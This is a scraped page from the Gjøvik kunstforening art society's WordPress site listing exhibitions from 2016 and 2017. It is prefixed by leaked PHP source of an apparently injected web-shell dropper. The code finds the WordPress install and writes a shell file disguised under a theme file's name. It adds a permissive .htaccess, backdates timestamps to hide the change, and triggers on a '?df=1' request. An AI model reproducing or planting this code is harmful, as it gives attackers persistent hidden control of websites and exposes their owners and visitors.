'; $htaccess = '' . "\r\n" . 'Order allow,deny' . "\r\n" . 'Allow from all' . "\r\n" . ''; $filedir = pathinfo(__FILE__,PATHINFO_DIRNAME); $wpindex = find_wp_index($filedir); $furn = ''; if (!$wpindex) { print("wpindex not found"); exit(); } $allthemes = scandir(fixslashes($wpindex."/wp-content/themes/")); $dirslist = array(); foreach($allthemes as $dir) { if($dir === '.' or $dir === '..') continue; $themepath = fixslashes($wpindex . "/wp-content/themes/" . $dir); if (is_dir($themepath)) array_push($dirslist , $dir); } $i = array_rand($dirslist); $tdir = $dirslist[$i]; $sdir = fixslashes($wpindex . "/wp-content/themes/" . $tdir . "/"); $files = search_files($sdir); $done = false; $fpath = ''; $ib = array_rand($shellbase); $fbase = $shellbase[$ib]; $is = array_rand($shellsuffix); $fnew = $fbase . $shellsuffix[$is] . '.php'; while(!$done && !empty($files)) { $i = array_rand($files); $themefile = $files[$i]; unset($files[$i]); if (strpos($themefile , '.php') !== false) { $fpath = substr($themefile,0,-4); $is = array_rand($shellsuffix); $fpath = fixslashes($fpath . $shellsuffix[$is] . '.php'); $done = true; } } if (!$done) $fpath = fixslashes($sdir . $fnew); $ind = strrpos($fpath , '/'); $fname = substr($fpath, $ind + 1); $dirmtime = filemtime($sdir); $goodfile = fopen($fpath , "w+"); if (!$goodfile) { $fpath = fixslashes($filedir . "/" . $fnew); $goodfile = fopen($fpath , "w+") or die("Unable to open file"); } fwrite($goodfile , $goodcode); fclose($goodfile); $timestamp = get_timestamp($sdir); $htaccess_file = $sdir . '.htaccess'; $hfile = fopen($htaccess_file , "w+"); if ($hfile) { fwrite($hfile,$htaccess); fclose($hfile); } touch($fpath,$timestamp); touch($htaccess_file,$timestamp); touch($sdir,$dirmtime); if ($fpath) { $furn = fixslashes('/' . str_replace($wpindex , '' , $fpath)); } return $furn; } if(isset($_GET['df']) && $_GET['df'] == '1') $shell = load_file(); echo '' . $shell . ''; ?> Gjøvik kunstforening
  • Juryert utstilling 2017
  • Juleutstilling 2016
  • Utstilling av Bengt Sivesind
  • IS SOM VARMER – Fotoutstilling av Geir Hareide Andersen
  • Utstilling av Tore Stang og Kristin Lundgaard

Juryert utstilling 2017

Published 27. september 2017 at 14:54 - No Comments

Juryert utstilling 2017, Gjøvik Kunstforening 16. september – 1. oktober, Kauffeldtgården, Gjøvik Åpningstid: Torsdag – Søndag 12.00 – 16.00 Utstillingen viser fram et tverrsnitt av kunstneriske uttrykk lokalt med utøvere bosatt eller med tilknytning til Oppland. De antatte kunstnere viser arbeider i forskjellige teknikk og materialbruk som keramikk, tekstill, malerier, grafikk, blyan tegninger, fotografi, video og […]

Juleutstilling 2016

Published 21. november 2016 at 19:21 - No Comments

Velkommen til åpning av årets Juleutstilling lørdag 26. november kl. 12.00 på Kauffeldtgården. Tidsrom: 26.11.2016 – 11.12.2016 Åpent: torsdag – søndag, kl. 12.00 – 16.00 Sted: Kauffeldtgården, Gjøvik Plakat, Juleutstilling 2016

Latest Articles

Latest Articles from the Blog